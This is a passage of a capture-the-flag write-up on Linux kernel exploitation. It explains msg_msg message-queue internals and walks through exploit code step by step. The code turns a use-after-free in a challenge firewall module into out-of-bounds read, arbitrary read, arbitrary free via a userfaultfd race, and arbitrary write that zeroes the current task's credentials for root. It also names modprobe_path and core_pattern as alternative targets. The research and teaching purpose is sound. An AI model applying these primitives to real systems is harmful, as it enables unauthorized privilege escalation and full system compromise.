msg = READ_ONCE(msr_d.r_msg);
if (msg != ERR_PTR(-EAGAIN))
goto out_unlock0;
list_del(&msr_d.r_list);
if (signal_pending(current)) {
msg = ERR_PTR(-ERESTARTNOHAND);
goto out_unlock0;
}
ipc_unlock_object(&msq->q_perm);
}
out_unlock0:
ipc_unlock_object(&msq->q_perm);
wake_up_q(&wake_q);
out_unlock1:
rcu_read_unlock();
if (IS_ERR(msg)) {
free_copy(copy);
return PTR_ERR(msg);
}
bufsz = msg_handler(buf, msg, bufsz); // [2]
free_msg(msg); // [3]
return bufsz;
}
|
As we can see, in do_msgrcv()
the kernel
uses
find_msg()
to locate the correct message [1], then, on success, after
performing some checks and unlinking the requested message from the
message queue, it calls msg_handler()
, previously set to
do_msg_fill()
to copy the message from kernel space to user space
[2]:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
struct msgbuf __user *msgp = dest;
size_t msgsz;
if (put_user(msg->m_type, &msgp->mtype))
return -EFAULT;
msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [2.1]
if (store_msg(msgp->mtext, msg, msgsz)) // [2.2]
return -EFAULT;
return msgsz;
}
|
do_msg_fill()
, checks if the requested message size is greater
than the size saved in msg->m_ts
[2.1]. If the requested size
exceeds the size saved in the message header, it will only copy
m_ts
bytes, otherwise it will use the size provided by the user.
This check is necessary to avoid an Out Of Bounds Read when the user
calls msgrcv()
. In our case, msgsz
will be equal to 0x1fc8 bytes.
Finally,
store_msg()
is called [2.2]. It copies msgsz
bytes (0x1fc8 in our case) from kernel space to the buffer provided by
the user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
size_t alen;
struct msg_msgseg *seg;
alen = min(len, DATALEN_MSG); // [2.2.1]
if (copy_to_user(dest, msg + 1, alen)) // [2.2.2]
return -1;
for (seg = msg->next; seg != NULL; seg = seg->next) { // [2.2.3]
len -= alen;
dest = (char __user *)dest + alen;
alen = min(len, DATALEN_SEG); // [2.2.4]
if (copy_to_user(dest, seg + 1, alen)) // [2.2.5]
return -1;
}
return 0;
}
|
store_msg()
, based on the size of alen
[2.2.1] (0xfd0 in our case, exactly what we have already seen in load_msg()
and alloc_msg()
), starts copying the message data to the user space buffer. [2.2.2]. Then it starts
traversing the list of segments until there are no more segments left
[2.2.3], calculating each time the size of alen
[2.2.4] and copying the segment data to user space [2.2.5]. In
our case there is only one segment from which to copy 0xff8 bytes.
Once the procedure is completed, as we can see in the
do_msgrcv()
source code, it
calls
free_msg()
[3] to deallocate the message and its respective segment:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;
security_msg_msg_free(msg);
seg = msg->next;
kfree(msg); // [3.1]
while (seg != NULL) { // [3.2]
struct msg_msgseg *tmp = seg->next;
cond_resched();
kfree(seg); // [3.3]
seg = tmp;
}
}
|
Initially free_msg()
uses kfree() to free the message [3.1],
then it starts traversing the singly linked list of segments [3.2] to deallocate them [3.3].
Now it is important to note, that if we call msgrcv()
with the
MSG_COPY flag,
for example as follows:
1
2
|
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
|
the kernel will not destroy the original message.
From the
do_msgrcv()
source code, we can see that if MSG_COPY
is set, it uses prepare_copy()
to allocate a temporary message [4], then it calls
copy_msg()
to copy the content of the requested message (using memcpy()) into the
copy, this way, after copying the message to user space, the original
message is preserved, and the
copy is destroyed by free_msg()
.
This will be extremely important in the exploitation phase.
It is possible to use the MSG_COPY
flag only if the kernel is
compiled with CONFIG_CHECKPOINT_RESTORE
. This is true by default
in many Linux distributions.
The Exploit: Out Of Bounds Read
At this point, after analyzing the code used by the kernel to perform
message operations, it is quite clear how the corruption of message metadata can be used to compromise the kernel.
In the next sections, corrupting fields in the msg_msg
structure,
we will be able to find the address of the current task in memory and
override its credentials with zeroes to get root privileges.
How to get arbitrary read by corrupting the m_ts
field and the
next
field of the msg_msg
structure has already been shown by
the Linux kernel developer and security researcher Alexander Popov in
his excellent article Four Bytes of Power: Exploiting CVE-2021-26708 in
the Linux
kernel.
After reading his article, I wondered what other primitives
this elastic object could offer, and after analyzing the source code, I managed to turn it into
an exploitation toolkit.
Since the firewall does not offer any function we can exploit to get a
leak (remember, show_rule()
is exposed but not implemented), we can
cause a UAF duplicating a rule and freeing it, then we can allocated messages (because of SLUB LIFO behavior the rule chunk will be reused by one of the messages), and finally we can corrupt its m_ts
field using edit_rule()
, to get a Out Of Bounds Read primitive when msgrcv()
is called:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
[...]
void send_msg(int qid, int size, int c)
{
struct msgbuf
{
long mtype;
char mtext[size - 0x30];
} msg;
msg.mtype = 1;
memset(msg.mtext, c, sizeof(msg.mtext));
if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
{
perror("msgsnd");
exit(1);
}
}
[...]
// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("msgget");
exit(1);
}
if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("msgget");
exit(1);
}
// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);
send_msg(qid[0], 0x40, 'A'); // [3]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]
[...]
|
First, we create two queues
using msgget()
[1]. Let’s identify the first queue with QID #0
and the second one with QID #1
.
Then we cause a UAF adding a rule in firewall_rules_in
, duplicating it in firewall_rule_out
, and freeing it in firewall_rules_in
. [2]
Despite the pointer being set to NULL in firewall_rules_in
, it will be still be accessible in
firewall_rule_out
.
Now we can use send_msg()
(a msgsnd()
wrapper), to allocate three messages. We allocate a first message of
0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first
queue QID #0
[3]. Since we just freed the rule, it will be allocated at the same address. Now we have full control over the message header.
PS: It is important to note that this system is virtually noise-free. On a real system, we would need to saturate partial slabs before allocating the firewall rule and instead of allocating three messages, we would need to spray many of them.
Now we allocate two other messages in QID #1
, a first message of
0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data)
[4], that will be allocated always in kmalloc-64, and another one
of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data)
[5].
At this point the situation in memory should be similar to the following diagram. Please note that because of freelist randomization, the first message may be allocated
after the second one and our leak attempt may fail. In this case we
simply need to delete the second queue and run the exploit again.
In the diagram above, in orange, we can see the message header of the
first message in QID #0
. We have full control over this object
using edit_rule()
.
Always in kmalloc-64, we can also see the other
message, belonging to QID #1
. The m_list.prev
field of this
message, points to its message queue, QID #1
, the
m_list.next
field instead, points to the second message in
QID #1
, the large message in kmalloc-4k.
This message has a pointer to a segment, always in kmalloc-4k.
We are ready to get an information leak triggering a Out Of Bounds Read:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
[...]
void *recv_msg(int qid, size_t size)
{
void *memdump = malloc(size);
if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
{
perror("msgrcv");
return NULL;
}
return memdump;
}
[...]
uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
msg->m_type = 0;
msg->m_ts = size; // [2]
if (overwrite)
{
msg->next = target;
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
}
else
{
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
}
free(msg);
return recv_msg(qid[0], size); // [4]
}
[...]
uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]
[...]
|
Using arb_read()
[1] with a size
argument of
0x2000 bytes, we can overwrite the target object’s m_ts
field [2] using edit_rule()
[3].
Then, calling recv_msg()
(a msgrcv()
wrapper) [4], we get an information leak. It is important to note that in recv_msg()
we use the
MSG_COPY
flag: overwriting the target object, we corrupted its
m_list.next
and m_list.prev
fields, therefore if we don’t use
MSG_COPY
, do_msgrcv()
will try to unlink the message from the
queue, causing a crash.
As we can see from the figure above, we overwritten the m_ts
field in the msg_msg
in QID #0
, this will give us an Out Of Bounds Read primitive when recv_msg()
is called. This
way, we can leak the m_list.next
field of the message in QID #1
(the address of the large message in kmalloc-4k), the m_list.prev
field (the pointer to QID #1), and sysfs_bin_kfops_ro
.
PS: sysfs_bin_kfops_ro
comes from mounting /sys
in the init file. The symbol is there because the system is virtually noise-free: no other objects have been allocated since system startup. On a real system we would need to spray target objects in the slab before attempting to leak. For example, we could spray pipe_buffer
structures and then resize pipe rings to allocate them in kmalloc-64.
sysfs_bin_kfops_ro
belongs to the
kernel data section and it is not affected by FGKASLR, so we can
use it to calculate the kernel base address, or to calculate addresses of other
symbols in the data section.
The Exploit: From Out Of Bounds Read To Arbitrary Read
In the previous section, among other things, we leaked the address of
sysfs_bin_kfops_ro
. We can use it to calculate the address of
init_task.
init_task
corresponds to the address of the first process executed
by the system. In Linux every task is defined by the structure
task_struct. Tasks are linked together in a circular doubly linked list, tasks.
In our discussion we are interested in three fields of
task_struct
:
tasks
, the circular doubly linked list of tasks: for each task it contains pointers to the next and previous task.
pid,
the process identifier, and
cred,
a structure that contains the process credentials, uid,gid etc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
[...]
uint64_t find_current_task(uint64_t init_task)
{
pid_t pid, next_task_pid;
uint64_t next_task;
pid = getpid();
printf("[+] Current task PID: %d\n", pid);
puts("[*] Traversing tasks...");
leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
next_task = leak[0x298/8] - 0x298;
leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
next_task_pid = leak[0x398/8];
while (next_task_pid != pid) // [2]
{
next_task = leak[0x298/8] - 0x298; // [3]
leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
next_task_pid = leak[0x398/8]; // [4]
}
puts("[+] Current task found!");
return next_task;
}
[...]
puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);
[...]
|
In the source code above, we use the function find_current_task()
[1] to traverse all tasks, starting from init_task
until the current task is found [2].
find_current_task()
uses arb_read()
multiple times,
overwriting the m_ts
field and the next
pointer of the target
object msg_msg
.
For each task it leaks the pointer to the next
task [3] and the task PID [4], then it compares the leaked PID
with the current process PID, until there is a match:
In the figure above we can see that now the m_ts
field of the
target object is set to 0x2000 and its segment pointer, points to
init_task
.
Now, calling msgrcv()
, the kernel will not only copy 0xfd0 bytes from the message, but it will also copy
0xff8 bytes from fake segment: init_task
.
Once we found the current task, we can use our arbitrary read primitive
to leak the address of its cred
structure.
1
2
3
4
5
6
7
|
[...]
leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);
[...]
|
The Exploit: Arbitrary Free
At this point, we know the address of the current task and its cred
structure. Now we need to obtain arbitrary write, but it is not so simple. First we need to get an arbitrary free primitive.
Arbitrary free, can be obtained using msgrcv()
(without the MSG_COPY
flag)
two times:
1
2
3
4
5
6
|
[...]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]
[...]
|
The first time we call msgrcv()
[1], the kernel will free the
first message (in kmalloc-64) belonging to QID #1
. When we call it
again [2], the kernel will free the second message
(in kmalloc-4k) and its respective segment (in kmalloc-4k), always
belonging to QID #1
. The result in memory will be the following:
Now, this is a very important step, and can be quite confusing.
In the first part of the exploit, we leaked the address of the message in
kmalloc-4k. In the previous step, when we used msgrcv()
for the
second time, the kernel in free_msg()
released the message in kmalloc-4k
and then it released its segment.
Because of freelists LIFO
behavior, when we allocate a new message and corresponding segment in kmalloc-4k, the new
message will be allocated at the address of the old segment and the new segment at the address of the old message.
In other words, when we free and re-allocate message and segment, positions are swapped.
Since we previously leaked the address of the message, what we know after re-allocation is the address of the new segment.
Here is a visual representation. We know the address of the green chunk:
Now that we clarified this important point, we can use pthread to
allocate a new message and its respective segment in kmalloc-4k:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
[...]
void *allocate_msg1(void *_)
{
printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);
if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
{
perror("msgget");
exit(1);
}
memset(page_1, 0, PAGE_SIZE);
((unsigned long *)(page_1))[0xff0 / 8] = 1;
if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
{
puts("msgsend failed!");
perror("msgsnd");
exit(1);
}
puts("[Thread 1] Message sent, *next overwritten!");
}
[...]
pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]
[...]
|
We create a new thread that will execute allocate_msg1()
[1]. Here, we create a new
queue [2], QID #2
, then we use msgsnd()
[3] to
create a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes
of data), that in kernel space will result in a 0x1000 bytes message
(0x30 bytes of header and 0xfd0 bytes of data), allocated in kmalloc-4k, and a
segment of 0x1000 bytes (0x8 bytes for the next
pointer and 0xff8
bytes of data) always allocated in kmalloc-4k.
The location page_1 + PAGE_SIZE - 0x10
is not
random, we use
userfaultfd
to monitor the location page_1 + PAGE_SIZE
,
waiting for a page fault.
When load_msg()
will try to
copy our message to kernel space, it will
cause a page fault. At that point we will be able to suspend the kernel thread during the copy_from_user()
operation.
This will result in the following situation in memory:
We can finally use the arbitrary free primitive:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
[...]
void arb_free(int idx, uint64_t target)
{
struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
void *memdump = malloc(0x2000);
msg->m_list.next = queue; // [2]
msg->m_list.prev = queue;
msg->m_type = 1;
msg->m_ts = 0x10;
msg->next = target; // [3]
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]
puts("[*] Triggering arb free...");
msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
puts("[+] Target freed!");
free(memdump);
free(msg);
}
[...]
arb_free(0, large_msg); // [1]
[...]
|
The function arb_free()
[1], is used to free the new segment.
We use the message queue leaked in the first part of the exploit, to fix
m_list.next
and m_list.prev
[2], this, will allow us to use msgrcv()
without the MSG_COPY
flag, and the kernel will not crash during the unlinking procedure.
We also set
the message next
pointer to the target address
[3]: the new segment in kmalloc-4k.
When we overwrite the message [4] the
situation in memory will be the following:
Now we can finally use msgrcv()
[5] to free the message in QID #0
and the new segment:
The Exploit: From Arbitrary Free To Arbitrary Write
Now the next
pointer of our message in kmalloc-4k, points to
a free object. We can create a new thread, and allocate
another message in that location:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
[...]
void *allocate_msg2(void *_)
{
printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);
if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
{
perror("msgget");
exit(1);
}
memset(page_2, 0, PAGE_SIZE);
((unsigned long *)(page_2))[0xff0 / 8] = 1;
if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
{
puts("msgsend failed!");
perror("msgsnd");
exit(1);
}
puts("[Thread 2] Message sent, target overwritten!");
}
[...]
pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]
[...]
|
We create a new thread [1], then in
allocate_msg2()
we create another queue, QID #3
[2] and we use msgsend()
to allocate a 0x1028 bytes message [3]
(0x30 bytes of header and 0xff8 of data).
In kernel space this message
will result in a 0x1000 bytes message (0x30 bytes of header and 0xfd0
bytes of data), that will be allocated at the same address as the
segment we previously freed with the arbitrary free primitive, and a 0x30 bytes
segment (0x8 bytes for the next
pointer and 0x28 bytes of data) that
will be allocated in kmalloc-64.
This time, our buffer is located
at page_2 + PAGE_SIZE - 0x10
because we are
monitoring page_2 + PAGE_SIZE
with another
userfaultfd
thread, waiting for a page fault.
load_msg()
will hit the monitored page, causing the following situation in memory:
We can finally release the first faulting thread, this
way we will be able to overwrite the next
pointer of the message we
have just allocated in kmalloc-4k with the address of the current task’s cred
- 0x8 bytes:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
[...]
if (page_fault_location == page_1 + PAGE_SIZE)
{
printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
memset(buff, 0, PAGE_SIZE);
puts("[PFH 1] Releasing faulting thread");
struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);
msg->m_type = 0x1;
msg->m_ts = 0x1000;
msg->next = (uint64_t)(cred_struct - 0x8); // [1]
ufd_copy.dst = (unsigned long)(page_fault_location);
ufd_copy.src = (unsigned long)(&buff);
ufd_copy.len = PAGE_SIZE;
ufd_copy.mode = 0;
ufd_copy.copy = 0;
for (;;)
{
if (release_pfh_1)
{
if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
{
perror("ioctl(UFFDIO_COPY)");
exit(1);
}
puts("[PFH 1] Faulting thread released");
break;
}
}
}
[...]
|
We are subtracting 8 bytes [1] because
we need the first QWORD in the segment to be NULL, otherwise
load_msg()
will try to access the next segment causing a crash.
Once the first faulting thread is released, this is how the memory will look
like:
The next
pointer of the
message in QID #3
now points to the current task credentials.
The last step is predictable, we release the second faulting thread overwriting the
credentials with zeroes. This, will give us root
privileges:
Here is the exploit in action:
The complete exploit can be found here:
exploit.c
Conclusion
The technique described in the previous sections is applicable in multiple
caches, starting from kmalloc-64 up to kmalloc-4k. In the specific
case of kmalloc-4k, the exploitation turns out to be simpler, to learn
more, I recommend you to read the excellent writeup of Fire of
Salvation
by FizzBuzz101.
It is worth noting that in a less protected environment,
such as common Linux distributions (with CONFIG_STATIC_USERMODEHELPER
unset, without FGKASLR so on), the technique can be simplified by
targeting modrpobe_path
, core_pattern
etc, instead of targeting the
current task’s credentials.
As always, for any question or clarification feel free
to contact me (check About).
Challenges links: Fire of
Salvation
/ Wall of
Perdition
References
SMAP / SMEP
FGKASLR
NetFilter
CVE-2021-26708 by a13xp0p0v